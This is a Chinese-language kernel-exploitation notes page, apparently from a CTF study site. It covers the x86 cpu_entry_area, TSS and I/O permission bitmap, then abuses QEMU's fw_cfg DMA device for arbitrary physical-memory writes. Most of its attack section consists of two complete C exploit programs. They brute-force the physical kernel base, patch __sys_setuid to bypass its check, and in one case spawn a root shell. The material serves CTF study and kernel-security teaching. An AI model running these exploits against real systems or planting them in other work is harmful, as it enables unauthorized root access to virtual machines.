> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/cea.md).

# CEA

[make cpu-entry-area great again – kqx](https://kqx.io/post/sp0/)

## cpu\_entry\_area

地址位于

```c
0xfffffe0000000000 - 0xfffffe7fffffffff (=39 bits) cpu_entry_area mapping
```

结构体如下

[cpu\_entry\_area.h - arch/x86/include/asm/cpu\_entry\_area.h - Linux source code v7.0.10 - Bootlin Elixir Cross Referencer](https://elixir.bootlin.com/linux/v7.0.10/source/arch/x86/include/asm/cpu_entry_area.h#L90)

```c
struct cpu_entry_area {
	char gdt[PAGE_SIZE];

	/*
	 * The GDT is just below entry_stack and thus serves (on x86_64) as
	 * a read-only guard page. On 32-bit the GDT must be writeable, so
	 * it needs an extra guard page.
	 */
#ifdef CONFIG_X86_32
	char guard_entry_stack[PAGE_SIZE];
#endif
	struct entry_stack_page entry_stack_page;

#ifdef CONFIG_X86_32
	char guard_doublefault_stack[PAGE_SIZE];
	struct doublefault_stack doublefault_stack;
#endif

	/*
	 * On x86_64, the TSS is mapped RO.  On x86_32, it's mapped RW because
	 * we need task switches to work, and task switches write to the TSS.
	 */
	struct tss_struct tss;

#ifdef CONFIG_X86_64
	/*
	 * Exception stacks used for IST entries with guard pages.
	 */
	struct cea_exception_stacks estacks;
#endif
	/*
	 * Per CPU debug store for Intel performance monitoring. Wastes a
	 * full page at the moment.
	 */
	struct debug_store cpu_debug_store;
	/*
	 * The actual PEBS/BTS buffers must be mapped to user space
	 * Reserve enough fixmap PTEs.
	 */
	struct debug_store_buffers cpu_debug_buffers;
};
```

64位程序中

```c
struct cpu_entry_area {
	char gdt[PAGE_SIZE];
	struct entry_stack_page entry_stack_page;
	struct tss_struct tss;
	struct cea_exception_stacks estacks;
    struct debug_store cpu_debug_store;
	struct debug_store_buffers cpu_debug_buffers;
};
```

包括

```c
GDT
SP0
TSS
IST1~5
```

### **SP0/入口栈页**

从 `syscall` 进入后，将 `rsp` 切到 `entry_stack_page` ，完成 `cr3` 转换，然后从 `tss` 取出 `rsp0` ，存放着当前进程内核栈的栈顶地址，将 `rsp` 切换到 `rsp0` ，然后保存寄存器并进入`do_syscall_64`

在 `Linux 6.2` 前，`cpu_entry_area`并未随机化处理，而是映射到一个固定地址`0xfffffe0000001000`

> 地址 `0xfffffe0000000000` 包含 `IDT`

自 `Linux 6.2` 后，出于安全考虑，引入了 `cea_offset` 函数，当启用 `KASLR` 时，该函数会随机化 `cpu_entry_area` 相对于 `IDT`（仍位于固定地址 `0xfffffe0000000000` ）的偏移量

### **SGDT**

`x86` 指令，有时可在 `ring 3` 权限下使用，返回 `GDT` 的地址和大小

#### **UMIP 用户模式指令预防**

`CR4` 的第 `11` 位（ `UMIP` 位）可以为支持 `UMIP` 的 `CPU` 提供防护，当该位被置位时，当 `ring 3` 程序尝试执行 `SGDT/SIDT/SLDT/SMSW/STR` 会触发异常（通用保护故障 `GPF` ）

在现代 `Linux` 内核（ `5.4+` ）和较新的 `CPU` 上，`UMIP` 是默认开启的，然而，在 `Linux` 中 `ring 3` 执行不会触发异常，而是返回一些垃圾值

* `SGDT`此时返回 `0xfffffffffffe0000 << 16 | 0`
* `SIDT`： `0xffffffffffff0000 << 16 | 0`
* `SMSW`： `0x80050033`（Todo）
* `SLDT`： `0x50`（Todo）
* `STR`： `0x40`（Todo）

但是一般 `qemu` 不会开启 `UMIP` ，使用 `TCG` 时也没有实现补丁

### TSS

`TSS`的地址是可以预测的，可以重点关注一下这个结构体

```c
struct tss_struct {
	/*
	 * The fixed hardware portion.  This must not cross a page boundary
	 * at risk of violating the SDM's advice and potentially triggering
	 * errata.
	 */
	struct x86_hw_tss	x86_tss;

	struct x86_io_bitmap	io_bitmap;
} __aligned(PAGE_SIZE);

struct x86_hw_tss {
	u32			reserved1;
	u64			sp0;
	u64			sp1;

	/*
	 * Since Linux does not use ring 2, the 'sp2' slot is unused by
	 * hardware.  entry_SYSCALL_64 uses it as scratch space to stash
	 * the user RSP value.
	 */
	u64			sp2;

	u64			reserved2;
	u64			ist[7];
	u32			reserved3;
	u32			reserved4;
	u16			reserved5;
	u16			io_bitmap_base;

} __attribute__((packed));

/*
 * All IO bitmap related data stored in the TSS:
 */
struct x86_io_bitmap {
	/* The sequence number of the last active bitmap. */
	u64			prev_sequence;

	/*
	 * Store the dirty size of the last io bitmap offender. The next
	 * one will have to do the cleanup as the switch out to a non io
	 * bitmap user will just set x86_tss.io_bitmap_base to a value
	 * outside of the TSS limit. So for sane tasks there is no need to
	 * actually touch the io_bitmap at all.
	 */
	unsigned int		prev_max;

	/*
	 * The extra 1 is there because the CPU will access an
	 * additional byte beyond the end of the IO permission
	 * bitmap. The extra byte must be all 1 bits, and must
	 * be within the limit.
	 */
	unsigned long		bitmap[IO_BITMAP_LONGS + 1];

	/*
	 * Special I/O bitmap to emulate IOPL(3). All bytes zero,
	 * except the additional byte at the end.
	 */
	unsigned long		mapall[IO_BITMAP_LONGS + 1];
};
```

也就是

```c
struct tss_struct {
	u32			reserved1;
	u64			sp0;
	u64			sp1;
	u64			sp2;
	u64			reserved2;
	u64			ist[7];
	u32			reserved3;
	u32			reserved4;
	u16			reserved5;
	u16			io_bitmap_base;
    u64			prev_sequence;
	unsigned int		prev_max;
	unsigned long		bitmap[IO_BITMAP_LONGS + 1];
	unsigned long		mapall[IO_BITMAP_LONGS + 1];
} __aligned(PAGE_SIZE);
```

#### I/O端口

[Kernel Blues, or Why x86 Is So Convoluted | Henry Wang | Personal Website](https://thekidofarcrania.gitlab.io/2020/07/19/kernel-blues/)

**许多 I/O 端口实际上并不会触发GP（通用保护）异常**，而是直接成功通过，不过并非所有端口都如此

* 端口号较大的情况仍会触发 `GP`
* 某些特定端口号（如 `0x20` ...）也会触发 `GP`

`CPU` 与 `IO` 通信主要有两种方式

* **Isolated/port I/O(PIO)**：所有 `I/O` 设备被映射到与主内存地址空间分离的地址空间（端口号）
* **Memory-Mapping I/O(MMIO)**：`I/O` 设备直接映射到与主内存相同的地址空间

在 `x86` 架构中，由于需要完全向后兼容整个芯片家族，因此常常继承了旧芯片的历史遗留特性。

具体而言，它使用16位数字标识端口号，并且可以通过in/out指令一次性传递8/16/32位数值，实际上大多数I/O设备只支持8位数据传输，为了传输16/24/32位大小的数据，需要采取更巧妙的方式

* 某些I/O设备使用多个端口，每个端口对应结果的特定字节
* 某些I/O设备只使用一个端口，通过状态翻转机制实现，首次写入字节时对应低位，第二次写入时对应高位字节
* 某些I/O设备有一个选择器端口，用于选择在“数据”端口中设置哪个属性
* 某些I/O设备综合运用上述多种方式

除了少数的标准端口号会在所有机器上保持一致，大多数端口号会因为接入的设备而异

显然，如果能直接用in/out指令编写与I/O外设交互的代码，那么任何用户都可以随意“破坏“几乎所有东西，因此在保护模式时x86处理器会进行一系列的检查来限制对I/O的访问

对应in指令（以及out指令），触发通用保护需要三个关键条件

* 保护模式
* 当前权限级别大于I/O权限级别，**CPL>IOPL**
* 当前IO端口号不在”permission bit set“中（IO位图，每个端口占1bit，0表示允许，1表示禁止）

如果 TSS 中的 `io_bitmap_base` **大于或等于 TSS 的 Limit（界限）**，CPU 会认为**没有 I/O 位图**，从而**无条件拦截**所有 Ring 3 的 `in/out` 指令（触发 #GP），没触发则会通过`io_bitmap_base`（其值表示从 TSS 段起始位置的偏移量）找到位图，检查对应端口的bit位

还记得0x20端口会被禁用吗，这是因为这对应了tss->sp0字段，再加上tss的limit限制，我们大概只能访问0到0x340之间的端口

rflags寄存器中有一个名为IOPL的两个字段

当前特权级不大于线程的IOPL时允许处理器与端口交互，当然也可以修改TSS中的IOPB中对应的位掩码

该漏洞只在qemu上，不依赖内核版本和编译配置，启用KVM也同样有效

常规的qemu配置会打开一个设备，如下

```c
dev: fw_cfg_io, id ""
    dma_enabled = true
    x-file-slots = 32 (0x20)
    acpi-mr-restore = true
```

这个设备用于将文件从客户机传递到虚拟机，与设备交互的方法

```c
// 端口
#define FW_CFG_PORT_SEL     0x510 // 16-bit port
#define FW_CFG_PORT_DATA    0x511 // 8-bit port
#define BIOS_CFG_DMA_ADDR_HIGH  0x514 // 32-bit port
#define BIOS_CFG_DMA_ADDR_LOW   0x518 // 32-bit port

// selector
#define FW_CFG_SIGNATURE	    0x00
#define FW_CFG_ID		        0x01
#define FW_CFG_UUID		        0x02
#define FW_CFG_RAM_SIZE		    0x03
#define FW_CFG_NOGRAPHIC	    0x04
#define FW_CFG_NB_CPUS		    0x05
#define FW_CFG_MACHINE_ID	    0x06
#define FW_CFG_KERNEL_ADDR	    0x07
#define FW_CFG_KERNEL_SIZE	    0x08
#define FW_CFG_KERNEL_CMDLINE	0x09
#define FW_CFG_INITRD_ADDR	    0x0a
#define FW_CFG_INITRD_SIZE	    0x0b
#define FW_CFG_BOOT_DEVICE	    0x0c
#define FW_CFG_NUMA		        0x0d
#define FW_CFG_BOOT_MENU	    0x0e
#define FW_CFG_MAX_CPUS		    0x0f
#define FW_CFG_KERNEL_ENTRY	    0x10
#define FW_CFG_KERNEL_DATA	    0x11
#define FW_CFG_INITRD_DATA	    0x12
#define FW_CFG_CMDLINE_ADDR	    0x13
#define FW_CFG_CMDLINE_SIZE	    0x14
#define FW_CFG_CMDLINE_DATA	    0x15
#define FW_CFG_SETUP_ADDR	    0x16
#define FW_CFG_SETUP_SIZE	    0x17
#define FW_CFG_SETUP_DATA	    0x18
#define FW_CFG_FILE_DIR		    0x19

// FW_CFG_DIR struct
32位大端序数字
struct FWCfgFile {		/* an individual file entry, 64 bytes total */
   uint32_t size;		/* size of referenced fw_cfg item, big-endian */
   uint16_t select;		/* selector key of fw_cfg item, big-endian */
   uint16_t reserved;
   char name[56];		/* fw_cfg item name, NUL-terminated ascii */
};
```

很多内核pwn题会将flag存储在initramfs.cpio.gz或rootfs.cpio.gz，利用FW\_CFG\_INITRD\_DATA可以轻松转储这些文件内容

FW\_CFG\_PORT\_DMA用于单次快速DMA传输所有所需数据

```c
// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
    fw_ctl_error = 1,
    fw_ctl_read = 2,
    fw_ctl_skip = 4,
    fw_ctl_select = 8,
    fw_ctl_write = 16 // this only works on QEMU version < 2.4
} fw_cfg_ctl_t;

typedef struct FWCfgDmaAccess {
    uint32_t control;
    uint32_t length;
    uint64_t address;
} FWCfgDmaAccess;
```

要检查DMA传输是否启用，需从选择器FW\_CFG\_ID中读取数据，并验证第二位是否处于激活状态

为了设置DMA传输，我们需要将FWCfgDmaAccess结构体存储在一个已知的物理内存地址上

control字段指定了要执行的命令，在某些情况下还指定了要使用的选择器

length用于fw\_ctl\_read，指定要读取的字节数；以及fw\_ctl\_skip，指定要通过文件推进的查找位置字节数

address仅用于fw\_ctl\_read，并包含目标物理地址

设置好结构体后，我们只需将其物理地址写入FW\_CFG\_PORT\_DMA\_{LOW,HIGH}即可！通过改变数据块（例如initrd，因为它足够大，能包含从0到255的所有字节）的寻址位置，我们可以向任意物理地址写入任意字节

通过使用 ptregs 和 SP0 来找到一个包含用户可控数据的固定物理地址是轻而易举的

借助任意物理写入能力，我们可以使用与解决/dev/mem挑战（利用 kptr\_restrict）相同的判定方法，来找到内核的物理地址。此时，我们可以修补\_\_sys\_setuid函数，以授予任意用户root权限

原来我们可以将字符串"QEMU"（或任意子串）存储到任意物理地址中。这可以通过使用签名选择器（FW\_CFG\_SIGNATURE）来实现，通过修补\_\_sys\_setuid+61可以实现

下面是两种实现方法

```c
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <arpa/inet.h>
#include <string.h>

// PWN CONSTANTS
#define CONFIG_PHYSICAL_START   0x1000000ul
#define CONFIG_PHYSICAL_ALIGN   0x0200000ul

#define KPTR_RESTRICT           "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET    0x1eb93a0ul

#define SETUID_CHECK            0x02b960dul
#define SETUID_PATCH            0x75        // je -> jne

// CFG PORTS
#define FW_CFG_PORT_SEL         0x510
#define FW_CFG_PORT_DATA        0x511
#define BIOS_CFG_DMA_ADDR_HIGH  0x514
#define BIOS_CFG_DMA_ADDR_LOW   0x518

#define FW_CFG_SIGNATURE	    0x00
#define FW_CFG_ID		        0x01
#define FW_CFG_UUID		        0x02
#define FW_CFG_RAM_SIZE		    0x03
#define FW_CFG_NOGRAPHIC	    0x04
#define FW_CFG_NB_CPUS		    0x05
#define FW_CFG_MACHINE_ID	    0x06
#define FW_CFG_KERNEL_ADDR	    0x07
#define FW_CFG_KERNEL_SIZE	    0x08
#define FW_CFG_KERNEL_CMDLINE	0x09
#define FW_CFG_INITRD_ADDR	    0x0a
#define FW_CFG_INITRD_SIZE	    0x0b
#define FW_CFG_BOOT_DEVICE	    0x0c
#define FW_CFG_NUMA		        0x0d
#define FW_CFG_BOOT_MENU	    0x0e
#define FW_CFG_MAX_CPUS		    0x0f
#define FW_CFG_KERNEL_ENTRY	    0x10
#define FW_CFG_KERNEL_DATA	    0x11
#define FW_CFG_INITRD_DATA	    0x12
#define FW_CFG_CMDLINE_ADDR	    0x13
#define FW_CFG_CMDLINE_SIZE	    0x14
#define FW_CFG_CMDLINE_DATA	    0x15
#define FW_CFG_SETUP_ADDR	    0x16
#define FW_CFG_SETUP_SIZE	    0x17
#define FW_CFG_SETUP_DATA	    0x18
#define FW_CFG_FILE_DIR		    0x19


// https://wiki.osdev.org/QEMU_fw_cfg
struct FWCfgFile {
    uint32_t size;		/* size of referenced fw_cfg item, big-endian */
    uint16_t select;	/* selector key of fw_cfg item, big-endian */
    uint16_t reserved;
    char name[56];		/* fw_cfg item name, NUL-terminated ascii */   
};

// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
    fw_ctl_error = 1,
    fw_ctl_read = 2,
    fw_ctl_skip = 4,
    fw_ctl_select = 8,
    fw_ctl_write = 16
} fw_cfg_ctl_t;

typedef struct FWC_fg_dma_access {
    uint32_t control;
    uint32_t length;
    uint64_t address;
} FWC_fg_dma_access;

uint8_t* initrd_cache = NULL;

uint64_t get_physical_addr(uint64_t virt_addr) {
    int page_size = getpagesize();
    uint64_t page_offset = virt_addr % page_size;
    uint64_t virt_page_index = virt_addr / page_size;

    // Open pagemap
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1) {
        perror("open pagemap");
        return -1;
    }

    // Seek to the entry in pagemap
    uint64_t entry;
    if (lseek(fd, virt_page_index * sizeof(entry), SEEK_SET) == -1) {
        perror("lseek pagemap");
        close(fd);
        return -1;
    }

    if (read(fd, &entry, sizeof(entry)) != sizeof(entry)) {
        perror("read pagemap");
        close(fd);
        return -1;
    }

    close(fd);

    // Check if page is present
    if (!(entry & (1ULL << 63))) {
        fprintf(stderr, "Page not present\n");
        return -1;
    }

    // PFN is bits 0-54 (if present)
    uint64_t pfn = entry & ((1ULL << 55) - 1);
    uint64_t phys_addr = (pfn * page_size) + page_offset;

    return phys_addr;
}

//
// returns physical address of a valid cmd struct and initializes it
//
uint64_t default_get_cmd(uint32_t control, uint64_t address, uint32_t length){
    FWC_fg_dma_access* cmd = calloc(1, sizeof(FWC_fg_dma_access));
    cmd->control = htonl(control);
    cmd->address = htobe64(address);
    cmd->length = htonl(length);
    return get_physical_addr((uint64_t)cmd);
}

uint32_t get_initrd_size(){
    uint32_t initrd_size = 0;

    outw(FW_CFG_INITRD_SIZE, FW_CFG_PORT_SEL);
    for(int i = 0; i < 0x4; ++i)
        *((int8_t *)&initrd_size + i) = inb(FW_CFG_PORT_DATA);
    
    return initrd_size;
}
uint8_t* read_initrd(){
    uint32_t initrd_size;
    uint8_t* initrd_data;

    if(initrd_cache != NULL)
        return initrd_cache;

    initrd_size = get_initrd_size();
    initrd_data = calloc(1, initrd_size);

    if(initrd_data == NULL)
        return NULL;
    
    outw(FW_CFG_INITRD_DATA, FW_CFG_PORT_SEL);
    for(int i = 0; i < initrd_size; ++i)
        initrd_data[i] = inb(FW_CFG_PORT_DATA);
    
    initrd_cache = initrd_data;
    return initrd_data;
}

int arbw(uint64_t phys_addr, uint8_t value, uint64_t (* get_cmd)(uint32_t, uint64_t, uint32_t)){
    uint64_t cmd_physaddr;
    uint32_t cmd_physaddr_lo;
    uint32_t cmd_physaddr_hi;

    uint64_t byte_addr;
    uint32_t byte_off;
    
    uint32_t initrd_size;
    uint8_t* initrd_data;
    
    //
    // Find the target byte in initrd
    //
    initrd_size = get_initrd_size();
    initrd_data = read_initrd();    

    byte_addr = (uint64_t)memmem(initrd_data, initrd_size, &value, sizeof(uint8_t));
    
    if(byte_addr == 0)
        return 0;
    
    byte_off = byte_addr - (uint64_t)initrd_data;

    //
    // Skip
    //
    if(get_cmd == NULL)
        cmd_physaddr = default_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
    else
        cmd_physaddr = get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
    

    //
    // 1 byte DMA transfer
    //
    if(get_cmd == NULL)
        cmd_physaddr = default_get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
    else
        cmd_physaddr = get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);

    return 1;
}

uint32_t check_kptr_restrict(){
    uint32_t r;
    FILE* f;
    f = fopen(KPTR_RESTRICT, "rb");
    fscanf(f, "%d", &r);
    fclose(f);
    return r;
}

int main(int argc, char** argv)
{       
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    // to gain this you need an actual vuln
    ioperm(0, 0xffff, 1);

    // phys kaslr bruteforce (using kptr_restrict as oracle)
    puts("start of bruteforce");
    uint64_t phys_kbase;
    for(phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x10000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
        if(!arbw(phys_kbase + KPTR_RESTRICT_OFFSET, 0xaa, NULL))
            goto err;
    }
    printf("phys kbase @ %p\n", phys_kbase);

    if(!arbw(phys_kbase + SETUID_CHECK, SETUID_PATCH, NULL))
        goto err;

    puts("pwned");
    return 0;

    err:
    puts("exploit failed");
    return 1;
}
```

```c
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <sys/syscall.h>
#include <signal.h>

#include <asm/ldt.h>

#define WRITE_LDT 1

#define CONFIG_PHYSICAL_START   0x1000000ul
#define CONFIG_PHYSICAL_ALIGN   0x0200000ul

#define KPTR_RESTRICT           "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET    0x1eb93a0ul

#define SETUID_CHECK            0x02b960dul

// CFG PORTS
#define FW_CFG_PORT_SEL         0x510
#define FW_CFG_PORT_DATA        0x511

#define BIOS_CFG_DMA_ADDR_HIGH  0x514
#define BIOS_CFG_DMA_ADDR_LOW   0x518

#define FW_CFG_SIGNATURE	    0x00
#define SIGNATURE               "QEMU"

#define SP0_PTREGS_PHYS_ADDR    0xf60cf58;				// depends on memory size, im running with 256M


// https://wiki.osdev.org/QEMU_fw_cfg


// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
    fw_ctl_error = 1,
    fw_ctl_read = 2,
    fw_ctl_skip = 4,
    fw_ctl_select = 8,
    fw_ctl_write = 16
} fw_cfg_ctl_t;

typedef struct FWCfgDmaAccess {
    uint32_t control;
    uint32_t length;
    uint64_t address;
} FWCfgDmaAccess;

void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    ucontext_t *uc = (ucontext_t *)context;

    uc->uc_mcontext.gregs[REG_RIP] += 3;
}

uint64_t sp0_get_cmd(uint32_t control, uint64_t address, uint32_t length) {
    control = htonl(control);
    address = htobe64(address);
    length = htonl(length);

    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15d, %1\n"
        "shl r15, 32\n"
        "mov r14d, %0\n"
        "or r15, r14\n"
        "mov r14, %2\n"
        "mov rax, 0\n"
        "div rax\n"
        ".att_syntax prefix\n"
        :
        : "r" (control), "r" (length), "r" (address)
        : "rax", "r14", "r15"
    );

    return SP0_PTREGS_PHYS_ADDR;
}

int arbw(uint64_t phys_addr, char* value, int size){
    uint64_t cmd_physaddr;
    uint32_t cmd_physaddr_lo;
    uint32_t cmd_physaddr_hi;

    uint64_t byte_addr;
    uint32_t byte_off;

    byte_addr = (uint64_t)memmem(SIGNATURE, sizeof(SIGNATURE), value, size);
    
    if(byte_addr == 0)
        return 0;
    
    byte_off = byte_addr - (uint64_t)SIGNATURE;

    //
    // Skip
    //
    cmd_physaddr = sp0_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_SIGNATURE << 16), 0, byte_off);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    if (cmd_physaddr_hi)
        outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
    

    //
    // 1 byte DMA transfer
    //
    cmd_physaddr = sp0_get_cmd(fw_ctl_read | (FW_CFG_SIGNATURE << 16), phys_addr, size);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    if (cmd_physaddr_hi)
        outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);


    return 0;
}

uint32_t check_kptr_restrict(){
    uint32_t r;
    FILE* f;
    f = fopen(KPTR_RESTRICT, "rb");
    fscanf(f, "%d", &r);
    fclose(f);
    return r;
}

void fw_cfg() {
    uint64_t phys_kbase;
    for (phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x1000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
        arbw(phys_kbase + KPTR_RESTRICT_OFFSET, SIGNATURE, sizeof(SIGNATURE));
        if(check_kptr_restrict() != 0)
            break;
    }
    printf("phys kbase @ %p\n", phys_kbase);

    arbw(phys_kbase + SETUID_CHECK+0, "E", 1);
    arbw(phys_kbase + SETUID_CHECK+1, "M", 1);
    arbw(phys_kbase + SETUID_CHECK+2, "E", 1);
    arbw(phys_kbase + SETUID_CHECK+3, "M", 1);
    arbw(phys_kbase + SETUID_CHECK+4, "E", 1);
    
    setuid(0);
    system("/bin/sh");
}

int main() {   
    // ioperm(0, 0xffff, 1);

    struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    fw_cfg();
	

    hlt("finished");
    return 0;
}
```
